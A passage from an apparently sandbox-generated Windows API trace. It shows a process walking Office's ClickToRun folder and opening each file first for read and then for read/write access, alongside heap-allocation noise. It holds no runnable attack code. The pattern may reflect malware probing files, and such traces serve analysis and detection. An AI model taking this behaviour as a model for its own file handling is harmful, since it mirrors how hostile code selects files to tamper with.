lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0079.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0079.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.243] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xa2e72000, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x578d8, dwReserved0=0xa1f548e0, dwReserved1=0x62ac276e, cFileName="MavInject32.exe", cAlternateFileName="MAVINJ~1.EXE")) returned 1 [0079.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.244] AreFileApisANSI () returned 1 [0079.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe", lpUsedDefaultChar=0x0) returned 74 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0079.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0079.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0079.245] AreFileApisANSI () returned 1 [0079.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0079.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85b20 [0079.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 74 [0079.245] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.246] GetFileType (hFile=0x430) returned 0x1 [0079.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0079.246] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.246] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.246] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.246] CloseHandle (hObject=0x430) returned 1 [0079.246] AreFileApisANSI () returned 1 [0079.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0079.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85120 [0079.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 74 [0079.246] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.247] GetFileType (hFile=0x430) returned 0x1 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0079.247] CloseHandle (hObject=0x430) returned 1 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0079.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.248] AreFileApisANSI () returned 1 [0079.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0079.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85ee0 [0079.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 74 [0079.248] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xa2e72000, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x578d8)) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0079.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0079.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.249] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8745c00, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x2ffa60, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mso20win32client.dll", cAlternateFileName="MSO20W~1.DLL")) returned 1 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0079.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0079.250] AreFileApisANSI () returned 1 [0079.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll", lpUsedDefaultChar=0x0) returned 79 [0079.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0079.250] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.250] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0079.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0079.250] AreFileApisANSI () returned 1 [0079.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0079.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0079.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 79 [0079.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.250] GetFileType (hFile=0x430) returned 0x1 [0079.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.250] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.250] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.251] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.251] CloseHandle (hObject=0x430) returned 1 [0079.251] AreFileApisANSI () returned 1 [0079.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0079.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0079.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 79 [0079.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.251] GetLastError () returned 0x20 [0079.251] GetLastError () returned 0x20 [0079.251] SetLastError (dwErrCode=0x20) [0079.251] GetLastError () returned 0x20 [0079.251] SetLastError (dwErrCode=0x20) [0079.251] GetLastError () returned 0x20 [0079.251] SetLastError (dwErrCode=0x20) [0079.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0079.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.252] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bb0837, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80bb0837, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xad6b600, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x475e60, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mso30win32client.dll", cAlternateFileName="MSO30W~1.DLL")) returned 1 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: 